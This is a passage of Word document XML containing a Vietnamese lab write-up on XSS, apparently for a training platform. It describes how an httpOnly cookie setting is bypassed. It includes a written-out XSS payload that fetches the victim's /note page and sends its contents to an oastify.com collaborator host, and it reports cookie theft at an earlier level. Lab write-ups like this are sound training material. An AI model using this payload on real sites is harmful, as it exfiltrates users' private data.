    <w:p w14:paraId="4F6762D0" w14:textId="00BAABC7" w:rsidR="00C15BE2" w:rsidRDefault="00C15BE2" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả cho thấy lệnh alert() đã được </w:t>
      </w:r>
      <w:r w:rsidR="00E61604">
        <w:t>thực thi thành công, chứng minh khả năng khai thác XSS trên bài lab, từ đó sử dụng lệnh fetch() để gửi request sang:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A8CE96" w14:textId="1D44AF8C" w:rsidR="004573E1" w:rsidRDefault="004573E1" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004573E1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F0F5198" wp14:editId="02E5A087">
            <wp:extent cx="5731510" cy="433705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="11120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3119" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="433705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09938633" w14:textId="4773E590" w:rsidR="00E61604" w:rsidRDefault="00E61604" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thành công lấy được cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509EAB0" w14:textId="49E0759C" w:rsidR="004573E1" w:rsidRDefault="004573E1" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004573E1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7139DEC2" wp14:editId="03BF8173">
            <wp:extent cx="5731510" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1239297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97758" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="952500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A230B9" w14:textId="4433E4C6" w:rsidR="00E61604" w:rsidRDefault="00E61604">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0FC1BC" w14:textId="036818F5" w:rsidR="00E61604" w:rsidRPr="00FF23DE" w:rsidRDefault="00E61604" w:rsidP="00E61604">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A92BAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66881B6B" w14:textId="1FD709CA" w:rsidR="00E61604" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00E61604">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00377B0F">
        <w:t>Về</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phần code trong endpoint search thì ở level 4 tương tự level 3 nhưng level này lại có một cấu hình khác:</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E61604" w:rsidRPr="008E43EE" w14:paraId="56BCFB81" w14:textId="77777777" w:rsidTr="008E26EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E90B4B6" w14:textId="77777777" w:rsidR="00E61604" w:rsidRPr="008E43EE" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60715F9D" w14:textId="77777777" w:rsidR="00E61604" w:rsidRPr="008E43EE" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786DFE65" w14:textId="77777777" w:rsidR="00E61604" w:rsidRPr="008E43EE" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC56C44" w14:textId="77777777" w:rsidR="00E61604" w:rsidRPr="008E43EE" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D7450B" w14:textId="77777777" w:rsidR="00E61604" w:rsidRPr="008E43EE" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8096C1" w14:textId="77777777" w:rsidR="00E61604" w:rsidRPr="008E43EE" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F244933" w14:textId="77777777" w:rsidR="00E61604" w:rsidRPr="008E43EE" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E18F055" w14:textId="77777777" w:rsidR="00E61604" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C52A40E" w14:textId="77777777" w:rsidR="00E61604" w:rsidRDefault="00E61604" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349ED499" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC8DFAB" w14:textId="2B4ADE58" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38C9CEC7" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>app.use(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="310E8907" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>  session({</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15AB9821" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>    resave: false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F7E182" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>    saveUninitialized: true,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A9328EC" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>    secret: process.env.SECRET_KEY,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A95A067" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>    cookie: {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="093771E1" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>      maxAge: 86400000,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F186BC7" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>      httpOnly: true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56EB7D1F" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>    },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232BE136" w14:textId="77777777" w:rsidR="00377B0F" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="00377B0F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>  })</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="585BD9BD" w14:textId="45AE7605" w:rsidR="00E61604" w:rsidRPr="00377B0F" w:rsidRDefault="00377B0F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00377B0F">
              <w:t>);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B096785" w14:textId="4E5EDEDC" w:rsidR="00E61604" w:rsidRPr="0089724A" w:rsidRDefault="00E61604" w:rsidP="00E61604">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0089724A">
        <w:t xml:space="preserve">Ở </w:t>
      </w:r>
      <w:r w:rsidR="00377B0F" w:rsidRPr="0089724A">
        <w:t xml:space="preserve">đây đã </w:t>
      </w:r>
      <w:r w:rsidR="0089724A" w:rsidRPr="0089724A">
        <w:t>cấu hình tạo middleware session cho Express với express-session thiết lập session ID lưu server</w:t>
      </w:r>
      <w:r w:rsidR="0089724A" w:rsidRPr="0089724A">
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">side, cookie có httpOnly và thời hạn 1 </w:t>
      </w:r>
      <w:r w:rsidR="00E861A1">
        <w:t>ngày.</w:t>
      </w:r>
      <w:r w:rsidR="00E861A1" w:rsidRPr="00E861A1">
        <w:t xml:space="preserve"> Ngăn JavaScript phía client đọc cookie qua document.cookie, giảm rủi ro bị đánh cắp cookie qua XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5231F" w14:textId="77777777" w:rsidR="00E61604" w:rsidRPr="00CF619D" w:rsidRDefault="00E61604" w:rsidP="00E61604">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EA877" w14:textId="07D3F647" w:rsidR="00E83E06" w:rsidRPr="00E83E06" w:rsidRDefault="00E83E06" w:rsidP="009F681C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00E83E06">
        <w:t xml:space="preserve">hay vì cố gắng “đọc” cookie bằng JavaScript (điều mà HttpOnly ngăn chặn), có thể </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00E83E06">
        <w:t>ép trình duyệt nạn nhân gửi yêu cầu cùng</w:t>
      </w:r>
      <w:r w:rsidR="009F681C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E83E06">
        <w:t>nguồn tới một endpoint mà server trả về dữ liệu nhạy cảm dựa trên session, rồi chuyển nội dung phản hồi đó ra ngoài. Nói ngắn gọn: HttpOnly ngăn JS lấy cookie, nhưng không ngăn trình duyệt gửi cookie khi gọi API cùng origin, và nếu server trả dữ liệu nhạy cảm chỉ dựa vào cookie thì dữ liệu đó có thể bị lợi dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9BAAD" w14:textId="77777777" w:rsidR="00E61604" w:rsidRDefault="00E61604" w:rsidP="00E61604">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E44BF" w14:textId="6290E242" w:rsidR="00F75865" w:rsidRDefault="00F75865" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Trước tiên, mình sẽ gửi payload lấy cookie như ở level trước:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77650AF8" w14:textId="71C1A75B" w:rsidR="00C743F7" w:rsidRDefault="00C743F7" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C743F7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B2756B" wp14:editId="15C79ECF">
            <wp:extent cx="5731510" cy="461645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="192436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60882" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="461645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEFA963" w14:textId="71F901C1" w:rsidR="00F75865" w:rsidRDefault="00F75865" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kiểm tra kết quả gói tín HTTP trong Burp Collaborator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8FDBD" w14:textId="1F820070" w:rsidR="00E54709" w:rsidRDefault="005E5C03" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005E5C03">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59577D23" wp14:editId="34200A5B">
            <wp:extent cx="5731510" cy="942340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="719091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91973" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="942340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="172F9FA1" w14:textId="7419C709" w:rsidR="00947E44" w:rsidRDefault="00947E44" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả cho thấy rằng giá trị document.cookie đã đã không được gửi đi cùng với request đến. Điều này chứng mình được rằng </w:t>
      </w:r>
      <w:r w:rsidR="00067F31" w:rsidRPr="0089724A">
        <w:t>httpOnly</w:t>
      </w:r>
      <w:r w:rsidR="00067F31">
        <w:t xml:space="preserve"> đã </w:t>
      </w:r>
      <w:r w:rsidR="00F6041E">
        <w:t>được sử dụng để ngăn chặn việc lấy cookie</w:t>
      </w:r>
      <w:r w:rsidR="00E26660">
        <w:t xml:space="preserve"> từ</w:t>
      </w:r>
      <w:r w:rsidR="00F6041E">
        <w:t xml:space="preserve"> bên ngoài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA2121" w14:textId="64B6EDF0" w:rsidR="00F6041E" w:rsidRDefault="00E26660" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Để thực hiện khai thác bài lab, đưa 1 giá trị vào note, nhằm tạo </w:t>
      </w:r>
      <w:r w:rsidR="00FD41D1">
        <w:t>dữ liệu lưu trong notes của người dung:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62157569" w14:textId="77777777" w:rsidR="00C743F7" w:rsidRDefault="00C743F7" w:rsidP="00C743F7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E54709">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A9014D3" wp14:editId="647BD91D">
            <wp:extent cx="5731510" cy="2472055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1647995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5616" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2472055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE40954" w14:textId="64D5AA8A" w:rsidR="00FD41D1" w:rsidRDefault="00FD41D1" w:rsidP="00C743F7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Truy cập vào list note và thành công đọc được giá trị ahihi vừa </w:t>
      </w:r>
      <w:r w:rsidR="0026746C">
        <w:t>xem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C462897" w14:textId="77777777" w:rsidR="00C743F7" w:rsidRDefault="00C743F7" w:rsidP="00C743F7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E54709">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E450E0A" wp14:editId="3A38940A">
            <wp:extent cx="5731510" cy="1241425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="512225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25902" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1241425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37ADDB" w14:textId="5010D31D" w:rsidR="00C743F7" w:rsidRDefault="0026746C" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp đó, để thực hiện mục tiêu khai thác của bài, thực hiện tạo một payload có khả năng</w:t>
      </w:r>
      <w:r w:rsidR="00D749C8">
        <w:t xml:space="preserve"> gửi request đến endpoint note </w:t>
      </w:r>
      <w:r w:rsidR="00957F21">
        <w:t xml:space="preserve">để lấy response </w:t>
      </w:r>
      <w:r w:rsidR="00D749C8">
        <w:t>chứa thông tin các note</w:t>
      </w:r>
      <w:r w:rsidR="00957F21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D749C8">
        <w:t>được lưu lại rồi gửi chúng qua Burp C</w:t>
      </w:r>
      <w:r w:rsidR="00957F21">
        <w:t>ollaprator:</w:t>
      </w:r>
      <w:r w:rsidR="00D749C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E5330">
        <w:t>&lt;img src=1 onerror='fetch("/note").then(function(response){ return</w:t>
      </w:r>
      <w:r w:rsidR="003E5330">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E5330">
        <w:t>response.text()}).then(function(string){fetch("https</w:t>
      </w:r>
      <w:r w:rsidR="003E5330" w:rsidRPr="003E5330">
        <w:t>ltibnic8akcgb93343hxw6n3cuil6cu1.oastify.com</w:t>
      </w:r>
      <w:r w:rsidR="003E5330">
        <w:t>?note="+encodeURI(string)) });'&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00957F21">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC6948" w14:textId="79E47C44" w:rsidR="00E61604" w:rsidRDefault="00E54709" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E54709">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FD8128E" wp14:editId="5206DF50">
            <wp:extent cx="5731510" cy="427355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="49326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5194" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="427355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DBBC8" w14:textId="0389135A" w:rsidR="00957F21" w:rsidRDefault="00957F21" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả được gửi về Burp Collaborator cho thấy rằng chuỗi ahihi đã được gửi tới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E829EC4" w14:textId="081BE7BD" w:rsidR="00E54709" w:rsidRDefault="00E54709" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E54709">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3195F149" wp14:editId="554958E7">
            <wp:extent cx="5731510" cy="1505585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="189570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0462" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1505585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88B734" w14:textId="454DA44D" w:rsidR="00957F21" w:rsidRDefault="00957F21" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Với các thông tin này, </w:t>
      </w:r>
      <w:r w:rsidR="00D851FC">
        <w:t xml:space="preserve">để chứng minh khả năng khai thác thật sự của payload trên lab </w:t>
      </w:r>
      <w:r w:rsidR="00B10EA9">
        <w:t>(các phần trên đều được thực thi ở local)</w:t>
      </w:r>
      <w:r>
        <w:t>mình sẽ thực hiện lấy flag của bài bằng cách</w:t>
      </w:r>
      <w:r w:rsidR="00D851FC">
        <w:t xml:space="preserve"> sử dụng payload trên lab trực tiếp của c</w:t>
      </w:r>
      <w:r w:rsidR="00B10EA9">
        <w:t>yberjustsu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB15F71" w14:textId="126D2169" w:rsidR="00492FC5" w:rsidRDefault="00492FC5" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00492FC5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA771B6" wp14:editId="0CD06CE3">
            <wp:extent cx="5731510" cy="1977390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1484206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6012" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1977390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
